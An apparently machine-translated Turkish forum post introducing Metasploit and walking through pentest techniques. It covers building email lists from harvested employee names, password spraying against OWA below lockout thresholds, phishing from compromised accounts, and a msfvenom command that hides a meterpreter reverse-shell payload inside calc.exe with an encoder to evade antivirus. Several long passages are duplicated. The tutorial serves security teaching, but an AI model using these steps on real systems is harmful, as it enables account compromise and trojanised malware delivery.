METASPLOİT
Siber suçlar tüm zamanların en yüksek seviyesindeyken , iş dünyasında güvenliğin nasıl kullanılacağını öğrenmek her zamankinden daha önemli. Penetrasyon testi , işletmelerin BT altyapılarının genel güvenliğini değerlendirmelerine olanak tanır. Metasploit, bir işletmenin bilgisayar korsanları tarafından istismar edilmeden önce sistemlerindeki güvenlik açıklarını bulmasına ve desteklemesine yardımcı olan en iyi sızma testi çerçevelerinden biridir. Basitçe söylemek gerekirse, Metasploit izinli olarak hacklemeye izin verir.
Metasploit'in Kısa Tarihi
Metasploit, HD Moore tarafından Ekim 2003'te, açıkların yaratılması ve geliştirilmesi için Perl tabanlı bir taşınabilir ağ aracı olarak tasarlandı ve geliştirildi. 2007 yılına kadar, çerçeve tamamen Ruby'de yeniden yazıldı . 2009'da Rapid7, Metasploit projesini satın aldı ve çerçeve, bilgisayar sistemlerinin güvenlik açığını test etmek için ortaya çıkan bir bilgi güvenliği aracı olarak popülerlik kazandı. Metasploit 4.0, Ağustos 2011'de piyasaya sürüldü ve bilinen hataların yanı sıra yazılım açıklarını keşfeden araçlar içeriyor.
Metasploit Nedir ve Nasıl Çalışır?
Metasploit, güvenlik mühendisleri tarafından bir sızma testi sistemi ve güvenlik araçları ve açıklardan yararlanmaya olanak tanıyan bir geliştirme platformu olarak kullanılan dünyanın önde gelen açık kaynaklı sızma çerçevesidir. Çerçeve, hem saldırganlar hem de savunucular için bilgisayar korsanlığını basitleştirir.
Metasploit'in çeşitli araçları, kitaplıkları, kullanıcı arayüzleri ve modülleri, bir kullanıcının bir istismar modülünü yapılandırmasına, bir yük ile eşleştirmesine, bir hedefe işaret etmesine ve hedef sistemde başlatmasına izin verir. Metasploit'in geniş ve kapsamlı veritabanı, yüzlerce istismar ve çeşitli faydalı yük seçenekleri barındırır.
Bir Metasploit sızma testi, bilgi toplama aşamasıyla başlar; burada Matsploit, Nmap, SNMP taraması ve Windows yama numaralandırma gibi çeşitli keşif araçlarıyla ve sisteminizdeki savunmasız noktayı bulmak için Nessus ile entegre olur. Zayıflık belirlendikten sonra, zırhtaki deliğe nüfuz etmek için bir istismar ve yük seçin. İstismar başarılı olursa, yük hedefte yürütülür ve kullanıcı, yük ile etkileşim kurmak için bir kabuk alır. Windows sistemlerine saldırmak için en popüler yüklerden biri, yalnızca bellek içi etkileşimli bir kabuk olan Meterpreter'dir. Hedef makinedeyken, Metasploit ayrıcalık yükseltme, paket koklama, hash geçişi, tuş kaydediciler, ekran yakalama ve ayrıca döndürme araçları için çeşitli istismar araçları sunar. Kullanıcılar, hedef makine yeniden başlatılırsa kalıcı bir arka kapı da kurabilir.
Metasploit'te bulunan kapsamlı özellikler modüler ve genişletilebilir olup, her kullanıcı gereksinimine göre yapılandırmayı kolaylaştırır.
Metasploit'in çeşitli araçları, kitaplıkları, kullanıcı arayüzleri ve modülleri, bir kullanıcının bir istismar modülünü yapılandırmasına, bir yük ile eşleştirmesine, bir hedefe işaret etmesine ve hedef sistemde başlatmasına izin verir. Metasploit'in geniş ve kapsamlı veritabanı, yüzlerce istismar ve çeşitli faydalı yük seçenekleri barındırır.
Bir Metasploit sızma testi, bilgi toplama aşamasıyla başlar; burada Matsploit, Nmap, SNMP taraması ve Windows yama numaralandırma gibi çeşitli keşif araçlarıyla ve sisteminizdeki savunmasız noktayı bulmak için Nessus ile entegre olur. Zayıflık belirlendikten sonra, zırhtaki deliğe nüfuz etmek için bir istismar ve yük seçin. İstismar başarılı olursa, yük hedefte yürütülür ve kullanıcı, yük ile etkileşim kurmak için bir kabuk alır. Windows sistemlerine saldırmak için en popüler yüklerden biri, yalnızca bellek içi etkileşimli bir kabuk olan Meterpreter'dir. Hedef makinedeyken, Metasploit ayrıcalık yükseltme, paket koklama, hash geçişi, tuş kaydediciler, ekran yakalama ve ayrıca döndürme araçları için çeşitli istismar araçları sunar. Kullanıcılar, hedef makine yeniden başlatılırsa kalıcı bir arka kapı da kurabilir.
Metasploit'te bulunan kapsamlı özellikler modüler ve genişletilebilir olup, her kullanıcı gereksinimine göre yapılandırmayı kolaylaştırır.
Metasploit'in Amacı Nedir?
Metasploit, ağ güvenliği uzmanları tarafından penetrasyon testleri yapmak, sistem yöneticileri tarafından yama kurulumlarını test etmek, ürün satıcıları tarafından regresyon testi uygulamak ve endüstrilerdeki güvenlik mühendisleri tarafından kullanılan güçlü bir araçtır. Metasploit'in amacı, kullanıcıların bilgisayar korsanlarının saldırılarına en çok nerede maruz kalacaklarını belirlemelerine yardımcı olmak ve bilgisayar korsanları tarafından istismar edilmeden önce bu zayıflıkları proaktif olarak onarmaktır.
Metasploit'i Kimler Kullanır?
Metasploit'in sunduğu geniş uygulama yelpazesi ve açık kaynak kullanılabilirliği ile çerçeve, geliştirme, güvenlik ve operasyonlardaki profesyoneller tarafından bilgisayar korsanlarına karşı kullanılır. Çerçeve, bilgisayar korsanları arasında popülerdir ve kolayca erişilebilir olduğundan, güvenlik profesyonellerinin kullanması gerekmese bile aşina olması için kurulumu kolay, güvenilir bir araç haline getirir.
Metasploit Kullanımları ve Faydaları
Metasploit size çeşitli kullanım durumları sunar ve faydaları şunları içerir:
- Açık Kaynak ve Aktif Olarak Geliştirilmiş – Metasploit, kaynak koduna erişmeye ve belirli özel modüller eklemeye izin verdiği için diğer yüksek ücretli sızma testi araçlarına tercih edilir.
- Kullanım Kolaylığı – Büyük bir ağ penetrasyon testi yaparken Metasploit'i kullanmak kolaydır. Metasploit, güvenlik açığından yararlanmak için tüm sistemlerde otomatik testler gerçekleştirir.
- Yükler Arasında Kolay Geçiş – set yükü komutu, yükleri değiştirmek için kolay ve hızlı erişim sağlar. Ölçer yorumlayıcıyı veya kabuk tabanlı erişimi belirli bir işlemle değiştirmek kolaylaşır.
- Daha Temiz Çıkışlar – Metasploit, tehlikeye attığı hedef sistemden temiz bir çıkışa izin verir.
- Dost GUI Ortamı – dostu GUI ve üçüncü taraf arayüzleri, sızma testi projesini kolaylaştırır.
Metasploit'te Hangi Araçlar Kullanılır?
Metasploit araçları, güvenlik uzmanları ve bilgisayar korsanları için sızma testinin daha hızlı ve sorunsuz çalışmasını sağlar. Ana araçlardan bazıları Aircrack, Metasploit unleashed, Wireshark, Ettercap, Netsparker, Kali vb.
Metasploitable Nedir?
Metasploitable, Metasploit'in öğrenilmesini ve uygulanmasını sağlayan savunmasız bir makineyi ifade eder. Sahibinin izni olmadan herhangi bir sistemi hacklemek veya saldırmak yasa dışıdır. Bu nedenle, metasploitable makine, kullanıcıların bilgisayar korsanlığını öğrenmek ve uygulamak için bir sızma testi ortamı kurmasını sağlar.
Metasploit Kabuk Türleri
Metasploit'te iki tür mermi vardır - hedef sisteme saldırmak veya onunla etkileşim kurmak için.
- Bind Shell – burada, hedef makine kurban makinede bir dinleyici açar ve ardından saldırgan uzak bir kabuk almak için dinleyiciye bağlanır. Bu kabuk türü risklidir çünkü herkes kabuğa bağlanıp komutu çalıştırabilir.
- Ters Kabuk – burada, başlık saldırgan üzerinde çalışır ve hedef sistem bir kabuk kullanarak saldırgana bağlanır. Ters kabuklar, bağlama kabuklarının neden olduğu sorunları çözebilir.
Metasploit Komutları
Metasploit'in bazı temel komutları msfconsole, banner, search, connect, cd, back, grep, işler, kill, load, info, show options, set, check, edit, use, exploit, exit, help ve diğerleridir.
Uygulamalı - Bir sistemi siber saldırılara karşı nasıl korursunuz
Bir sistemi siber saldırılara karşı korumak için Metasploit'i şu şekilde kullanabilirsiniz:
Uygulamalı - Bir sistemi siber saldırılara karşı nasıl korursunuz
Bir sistemi siber saldırılara karşı korumak için Metasploit'i şu şekilde kullanabilirsiniz:
- Terminalinizi açın ve “ Postgres SQL ” veritabanını başlatın.
- Metasploit arayüzüne gitmek için msfconsole komutunu çalıştırın
- Metasploitable sistemini veya kurban sistemini hacklemek için Metaspolit aracının bulunduğu Saldırgan sistemini kullanın.
- Bilgi toplamak için kurban sistemini tarayın.
- Kurbanın işletim sistemini taramak için nmap aracını çalıştırın
- Kurbanın sistemine erişmek için istismarı bulmak için arama komutunu kullanın
- İstismarın içine girin ve istismarda uzak ana bilgisayar IP'sini ayarlayın
- exploit komutunu çalıştırın ve kurban sistemine girmek için bekleyin
Sızma testi için Metasploitable OS kullanarak yasallığı koruduğunuzdan emin olun.
Açık Kaynak İstihbaratından Yararlanma : İntelden Faydalanmak
Özünde, doğrudan ve dolaylı olarak yararlanacağımız veriler olacaktır. Dolaylı derken, bir yardım masasını çağırmayı ve bir VPN portalının URL'sini veya bir kullanıcının e-posta adresini bırakarak isim vermeyi kastediyorum. Doğrudan dediğimde, daha çok hedefin varlıklarına yönelik düz parola saldırılarını düşünüyorum. Bu tür saldırıları gerçekleştirmek için topladığımız verilerden kullanıcı listeleri oluşturmamız gerekiyor.
Örnek olarak keşifte önceki Jigsaw modülünü ele alalım. Bir işletme için kişileri toplamak için 'recon/contacts/gather/http/web/jigsaw' modülünü kullandık. Modül bittiğinde, “kişileri göster” girerek sonuçları görebiliriz. Ayrıca sonuçları virgülle ayrılmış değerler (CSV) dosyasına "use report/csv_file" yazıp ardından "run" yazarak da seçebiliriz. Çıktı biraz aşağıdaki gibi görünecektir:
“Walt”,“Christensen”,“”,“Başkan Yardımcısı Paylaşılan Hizmetler”,“Maryland Heights, MO”,“Amerika Birleşik Devletleri”
“Wendy”,“Bibby”,“”,“Genel Müdür”,“New York, NY”,“Amerika Birleşik Devletleri”
“Wendy”,“McMullen”,“”,“Kıdemli Pazarlama Müdürü”,“Philadelphia, PA”,“Amerika Birleşik Devletleri”
“Wendy”,“Shiou”,“”,“Planlama ve Analiz ve Finans Müdürü”,“New York, NY”,“Amerika Birleşik Devletleri”
“Wesley”,“Stark”,“”,“Yönetmen, Yazılım Mühendisliği”,“New York, NY”,“Amerika Birleşik Devletleri”
“Willem”, “Şaraplar”, “”, “Test Mühendisi”, “New York, NY”, “Amerika Birleşik Devletleri”
“William”,“Schmitt”,“”,“Yönetici Yayıncı”,“New York, NY”,“Amerika Birleşik Devletleri”
Son Jigsaw örneğinde olduğu gibi, şimdiki yolum, genellikle kurumsal web sitesine bakarak veya Whois kayıtlarını kontrol ederek gerçek bir e-posta adresi kuralı oluşturmaya çalışmak olacaktır. Argüman adına diyelim ki hedef kullanıcılar [email protected] . Bu listeyi bizim için oluşturmak için yukarıdaki CSV dosyasını değiştirebiliriz.
root@pentest :~/Desktop# sed 's/"//g' contact.txt | awk -F, '{print $1"."$2"@offensivesite.com"}'
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Açıkça bu, listelerin çok daha büyük olduğu durumlarda faydalıdır, ki bu örnekte oldukları gibi, akıl sağlığı adına bu kısa tutulmuştur. İlk ve ikinci alanları (ad ve soyadı) bir virgül sınırlayıcıya göre yazdırmadan önce, tırnak işaretlerini çıkarın. Ardından, her satırın sonuna @sirketadi.com'u ekleyin. Bununla ilgili daha zarif yollar var, ancak bu hızlı ve işe yarıyor ve bu nedenle en uygun olanı denemek için bir durum olacak. Microsoft kullanıcıları verileri bu şekilde işlemek için kullanabilir. Bir Windows erkeği veya kızı için bile, veri işlemeyi gerçekleştirmek için kesinlikle bir Linux VM'ye sahip olmaya değer.
Yukarıdaki listeyi tüm keşif çalışması sırasında toplanan e-posta adresleriyle birleştirmeyi deneyin . Bu, hedefli ve geniş kapsamlı kimlik avı saldırıları için ve ayrıca bunları halka açık portallara karşı parola saldırıları için kullanmak için gruplara ayrılabilir . Bütün bunlar gerçekten verilen kapsama kadar kaynar. Daha önce de belirtildiği gibi, hibrit değerlendirmeler, penetrasyon testi ve sosyal mühendislik unsurlarını içerir , bu nedenle OWA'ya yönelik parola saldırıları olasılıkların ötesinde değildir.
Metasploit çerçevesi , OWA'ya saldıran parola için bir modül ile birlikte gelir. "auxiliary/scanner/http/owa_login"in çalışması için yalnızca aşağıdaki ayrıntılarla yapılandırılması gerekir:
RHOST—OWA sisteminin hedef IP Adresi.
RPORT—OWA'nın dinlediği bağlantı noktası, genellikle 443'tür.
USER_FILE—Yukarıda oluşturduğumuz çıktı. Genellikle “ad.soyad” tam e-posta adresinin yanı sıra çalışır.
ŞİFRE—Temel bilgilerle başlayın. Şifre1, şifre, şifre1. Çok sayıda kişi alındıysa, bunlardan birini bulma şansı yüksektir. Kuruluşun adını da denemeyi unutmayın.
Modülü çalıştırırken, hasat edilen her kullanıcıya karşı belirtilen şifreyi deneyecek ve herhangi bir başarı veya başarısızlık görüntüleyecektir. maalesef varhesapların kilitlenmesi olasılığının farkında olunması gerekir. Kesinlikle, birisi telefonda kilitleme politikasını vermeye ikna olmadıkça, bu kör uçuş gibi olacaktır. Dikkatli olun ve girişimleri her 30 dakikada bir birkaç kez yapın. Bu, denemelerde 30 dakikalık bir sıfırlama zamanlayıcısı ile kilitlemeden önce en yaygın üç denemelik kilitleme eşiğinin altında olmalıdır.
Bir parola saldırısı yaparak bir avuç hesaba erişim elde edilirse, bundan sonra ne olacak? Kapsam izin veriyorsa, e-postalardaki hassas bilgileri kontrol edin. İstemcinin güvenliğinin ihlal edilmesini istediği ek sistemler veya bilgiler için daha fazla erişim ayrıntıları keşfedilebilir.
Bu adımı tamamladıktan sonra, tüm kurumsal adres listesi indirilebilir ve OWA'ya karşı başka bir parola saldırısı daha yapılabilir. Bu, halihazırda sahip olunandan daha ayrıcalıklı bir hesap sağlayabilir.
Bu hesap aynı zamanda başka kimlik avı saldırıları için bir üs olarak da kullanılabilir, ancak bu sefer işin içinden gelecekler ve güvenilmeleri çok daha olası. Yanıtların yağdığını görünce kurbanın akıllanması muhtemeldir.
Bir başka ilginç fikir, bir toplantı isteğine veya takvim girdisine kötü amaçlı bir ek eklemektir. E-posta eklerinin tüm kötülüklerin kökü olduğu söylenmesine çok alıştığımız için, insanların şüphelenme olasılığı çok daha düşüktür. Başka bir açı, bu hesapları diğer sistemlere karşı denemek ve kullanmaktır. VPN sistemlerinin kimlik doğrulamaları için Active Directory'ye bağlı olduğunu görmek yaygındır . Citrix aracılığıyla dahili sunuculara uzaktan erişim sağlamak mümkün olabilir . Bu noktada, bu metnin kapsamının çok ötesine geçiyor ve penetrasyon testi alanlarına giriyor olabilir.
Örnek olarak keşifte önceki Jigsaw modülünü ele alalım. Bir işletme için kişileri toplamak için 'recon/contacts/gather/http/web/jigsaw' modülünü kullandık. Modül bittiğinde, “kişileri göster” girerek sonuçları görebiliriz. Ayrıca sonuçları virgülle ayrılmış değerler (CSV) dosyasına "use report/csv_file" yazıp ardından "run" yazarak da seçebiliriz. Çıktı biraz aşağıdaki gibi görünecektir:
“Walt”,“Christensen”,“”,“Başkan Yardımcısı Paylaşılan Hizmetler”,“Maryland Heights, MO”,“Amerika Birleşik Devletleri”
“Wendy”,“Bibby”,“”,“Genel Müdür”,“New York, NY”,“Amerika Birleşik Devletleri”
“Wendy”,“McMullen”,“”,“Kıdemli Pazarlama Müdürü”,“Philadelphia, PA”,“Amerika Birleşik Devletleri”
“Wendy”,“Shiou”,“”,“Planlama ve Analiz ve Finans Müdürü”,“New York, NY”,“Amerika Birleşik Devletleri”
“Wesley”,“Stark”,“”,“Yönetmen, Yazılım Mühendisliği”,“New York, NY”,“Amerika Birleşik Devletleri”
“Willem”, “Şaraplar”, “”, “Test Mühendisi”, “New York, NY”, “Amerika Birleşik Devletleri”
“William”,“Schmitt”,“”,“Yönetici Yayıncı”,“New York, NY”,“Amerika Birleşik Devletleri”
Son Jigsaw örneğinde olduğu gibi, şimdiki yolum, genellikle kurumsal web sitesine bakarak veya Whois kayıtlarını kontrol ederek gerçek bir e-posta adresi kuralı oluşturmaya çalışmak olacaktır. Argüman adına diyelim ki hedef kullanıcılar [email protected] . Bu listeyi bizim için oluşturmak için yukarıdaki CSV dosyasını değiştirebiliriz.
root@pentest :~/Desktop# sed 's/"//g' contact.txt | awk -F, '{print $1"."$2"@offensivesite.com"}'
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Açıkça bu, listelerin çok daha büyük olduğu durumlarda faydalıdır, ki bu örnekte oldukları gibi, akıl sağlığı adına bu kısa tutulmuştur. İlk ve ikinci alanları (ad ve soyadı) bir virgül sınırlayıcıya göre yazdırmadan önce, tırnak işaretlerini çıkarın. Ardından, her satırın sonuna @sirketadi.com'u ekleyin. Bununla ilgili daha zarif yollar var, ancak bu hızlı ve işe yarıyor ve bu nedenle en uygun olanı denemek için bir durum olacak. Microsoft kullanıcıları verileri bu şekilde işlemek için kullanabilir. Bir Windows erkeği veya kızı için bile, veri işlemeyi gerçekleştirmek için kesinlikle bir Linux VM'ye sahip olmaya değer.
Yukarıdaki listeyi tüm keşif çalışması sırasında toplanan e-posta adresleriyle birleştirmeyi deneyin . Bu, hedefli ve geniş kapsamlı kimlik avı saldırıları için ve ayrıca bunları halka açık portallara karşı parola saldırıları için kullanmak için gruplara ayrılabilir . Bütün bunlar gerçekten verilen kapsama kadar kaynar. Daha önce de belirtildiği gibi, hibrit değerlendirmeler, penetrasyon testi ve sosyal mühendislik unsurlarını içerir , bu nedenle OWA'ya yönelik parola saldırıları olasılıkların ötesinde değildir.
Metasploit çerçevesi , OWA'ya saldıran parola için bir modül ile birlikte gelir. "auxiliary/scanner/http/owa_login"in çalışması için yalnızca aşağıdaki ayrıntılarla yapılandırılması gerekir:
RHOST—OWA sisteminin hedef IP Adresi.
RPORT—OWA'nın dinlediği bağlantı noktası, genellikle 443'tür.
USER_FILE—Yukarıda oluşturduğumuz çıktı. Genellikle “ad.soyad” tam e-posta adresinin yanı sıra çalışır.
ŞİFRE—Temel bilgilerle başlayın. Şifre1, şifre, şifre1. Çok sayıda kişi alındıysa, bunlardan birini bulma şansı yüksektir. Kuruluşun adını da denemeyi unutmayın.
Modülü çalıştırırken, hasat edilen her kullanıcıya karşı belirtilen şifreyi deneyecek ve herhangi bir başarı veya başarısızlık görüntüleyecektir. maalesef varhesapların kilitlenmesi olasılığının farkında olunması gerekir. Kesinlikle, birisi telefonda kilitleme politikasını vermeye ikna olmadıkça, bu kör uçuş gibi olacaktır. Dikkatli olun ve girişimleri her 30 dakikada bir birkaç kez yapın. Bu, denemelerde 30 dakikalık bir sıfırlama zamanlayıcısı ile kilitlemeden önce en yaygın üç denemelik kilitleme eşiğinin altında olmalıdır.
Bir parola saldırısı yaparak bir avuç hesaba erişim elde edilirse, bundan sonra ne olacak? Kapsam izin veriyorsa, e-postalardaki hassas bilgileri kontrol edin. İstemcinin güvenliğinin ihlal edilmesini istediği ek sistemler veya bilgiler için daha fazla erişim ayrıntıları keşfedilebilir.
Bu adımı tamamladıktan sonra, tüm kurumsal adres listesi indirilebilir ve OWA'ya karşı başka bir parola saldırısı daha yapılabilir. Bu, halihazırda sahip olunandan daha ayrıcalıklı bir hesap sağlayabilir.
Bu hesap aynı zamanda başka kimlik avı saldırıları için bir üs olarak da kullanılabilir, ancak bu sefer işin içinden gelecekler ve güvenilmeleri çok daha olası. Yanıtların yağdığını görünce kurbanın akıllanması muhtemeldir.
Bir başka ilginç fikir, bir toplantı isteğine veya takvim girdisine kötü amaçlı bir ek eklemektir. E-posta eklerinin tüm kötülüklerin kökü olduğu söylenmesine çok alıştığımız için, insanların şüphelenme olasılığı çok daha düşüktür. Başka bir açı, bu hesapları diğer sistemlere karşı denemek ve kullanmaktır. VPN sistemlerinin kimlik doğrulamaları için Active Directory'ye bağlı olduğunu görmek yaygındır . Citrix aracılığıyla dahili sunuculara uzaktan erişim sağlamak mümkün olabilir . Bu noktada, bu metnin kapsamının çok ötesine geçiyor ve penetrasyon testi alanlarına giriyor olabilir.
İstemci tarafı saldırılar ve sosyal mühendislik
msfvenom, özellikle yürütülebilir kötü amaçlı yazılım oluşturmak için mevcut yükleri kullanmaya odaklanan Metasploit çerçevesine dahil olan bir araçtır . Bu, eski msfpayload ve msfencode araçlarının yerine geçer ve msfvenom çalıştırılarak yürütülür . Bu araç, ilgilendiğiniz yükün nasıl ele alınacağına dair bir dizi seçeneğe sahiptir. Hiçbir seçenek olmadan msfvenom'u çalıştırdığınızda , size bir yardım ekranı sunulur. --list seçeneğinin payloads veya encoders yönergesiyle birlikte kullanılması, aralarından seçim yapabileceğiniz yüzlerce kullanılabilir yükün ve kodlayıcının tam listesini sağlar. Her bir yüke özel seçenekler yürütülerek görülebilir.msfvenom --payload <payload> --payload-options . Örneği Ektedir ;
bu özel yükün çıkış tekniği, yerel adres ve yerel bağlantı noktası için seçenekler gerektirdiğini görebilirsiniz.
Bu aracı kullanarak, Metasploit'te bulunan herhangi bir yük için yük oluşturma çok hızlı ve kolay bir şekilde yapılabilir. Yürütülebilir dosyalara ve kitaplıklara ek olarak, msfpayload , istismarın kendisi gibi halihazırda sahip olabileceğiniz diğer kodlara dahil etmek için çeşitli diğer programlama dillerinde istenen yükü oluşturabilir. Örneğin, yükü C dilinde oluşturmak için --format c seçeneğini kullanabilir ve sonucu kesip diğer C kodunuza yapıştırabilirsiniz.
msfvenom ayrıca, Metasploit'in önceki sürümlerdeki msfencode yeteneğinin yerini alan bir istismar veya yükü kodlama yeteneğine de sahiptir. Çoğu durumda, temel güvenlik açıkları virüs tarayıcıları tarafından algılanabilir, ancak bunları kodlayarak, algılama rutinlerini atlama ve yükümüzün hedef sistemde yürütülmesini sağlama şansımız daha yüksektir. Ek olarak, msfvenom, bir yükü mevcut bir yürütülebilir dosyaya kodlamamıza da izin verir . Bu, normal bir uygulamayı alabileceğiniz, onu yükünüzle kodlayabileceğiniz ve son olarak aşağıdakileri içeren yürütülebilir dosyanın kodlanmış bir kopyasına sahip olabileceğiniz anlamına gelir.yük ve hedef sistemde çalışmaya hazır. Bu , gerçek bir kullanılabilir programın hedefe gönderildiği, ancak kötü amaçlı yazılımımızın onunla birlikte gönderildiği özel kötü amaçlı yazılımlarla ilgili konuştuğumuz kavramlarla çok iyi gider .
msfvenom bir dizi farklı kodlayıcıyı destekler ve bunların tümü, msfvenom --list encoders komutunun çalıştırılmasıyla elde edilen listede sıralanır . Bu çıktının bir kısmı aşağıdaki örnek gibi gösterilebilir
Bu kodlamayı gerçekleştirmenin en kolay yollarından biri, msfvenom komut seçeneklerini kullanarak yük üretiminden çıktıyı doğrudan ona yönlendirmektir. Hangi kodlama yöntemini kullanmak istediğinizi belirledikten sonra, çıktının hangi biçimde olması gerektiğini belirlersiniz. Örneğimiz için x86/shikata_ga_nai kodlayıcısını kullanacağız ve bir yürütülebilir dosyaya çıktı vereceğiz. Bunun sonuçları şu şekildedir.
Tartıştığımız diğer seçenek, mevcut bir yürütülebilir dosyayı kullanmak ve yükü ona kodlamaktı. Bu, --template seçeneği kullanılarak yapılır. Bu seçeneği kullanan örnek bir komut satırı şöyle olabilir:
bu özel yükün çıkış tekniği, yerel adres ve yerel bağlantı noktası için seçenekler gerektirdiğini görebilirsiniz.
Bu aracı kullanarak, Metasploit'te bulunan herhangi bir yük için yük oluşturma çok hızlı ve kolay bir şekilde yapılabilir. Yürütülebilir dosyalara ve kitaplıklara ek olarak, msfpayload , istismarın kendisi gibi halihazırda sahip olabileceğiniz diğer kodlara dahil etmek için çeşitli diğer programlama dillerinde istenen yükü oluşturabilir. Örneğin, yükü C dilinde oluşturmak için --format c seçeneğini kullanabilir ve sonucu kesip diğer C kodunuza yapıştırabilirsiniz.
msfvenom ayrıca, Metasploit'in önceki sürümlerdeki msfencode yeteneğinin yerini alan bir istismar veya yükü kodlama yeteneğine de sahiptir. Çoğu durumda, temel güvenlik açıkları virüs tarayıcıları tarafından algılanabilir, ancak bunları kodlayarak, algılama rutinlerini atlama ve yükümüzün hedef sistemde yürütülmesini sağlama şansımız daha yüksektir. Ek olarak, msfvenom, bir yükü mevcut bir yürütülebilir dosyaya kodlamamıza da izin verir . Bu, normal bir uygulamayı alabileceğiniz, onu yükünüzle kodlayabileceğiniz ve son olarak aşağıdakileri içeren yürütülebilir dosyanın kodlanmış bir kopyasına sahip olabileceğiniz anlamına gelir.yük ve hedef sistemde çalışmaya hazır. Bu , gerçek bir kullanılabilir programın hedefe gönderildiği, ancak kötü amaçlı yazılımımızın onunla birlikte gönderildiği özel kötü amaçlı yazılımlarla ilgili konuştuğumuz kavramlarla çok iyi gider .
msfvenom bir dizi farklı kodlayıcıyı destekler ve bunların tümü, msfvenom --list encoders komutunun çalıştırılmasıyla elde edilen listede sıralanır . Bu çıktının bir kısmı aşağıdaki örnek gibi gösterilebilir
Bu kodlamayı gerçekleştirmenin en kolay yollarından biri, msfvenom komut seçeneklerini kullanarak yük üretiminden çıktıyı doğrudan ona yönlendirmektir. Hangi kodlama yöntemini kullanmak istediğinizi belirledikten sonra, çıktının hangi biçimde olması gerektiğini belirlersiniz. Örneğimiz için x86/shikata_ga_nai kodlayıcısını kullanacağız ve bir yürütülebilir dosyaya çıktı vereceğiz. Bunun sonuçları şu şekildedir.
Tartıştığımız diğer seçenek, mevcut bir yürütülebilir dosyayı kullanmak ve yükü ona kodlamaktı. Bu, --template seçeneği kullanılarak yapılır. Bu seçeneği kullanan örnek bir komut satırı şöyle olabilir:
Kod:
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 --encoder x86/shikata_ga_nai --template calc.exe --out calc_evil.exe
Moderatör tarafında düzenlendi:
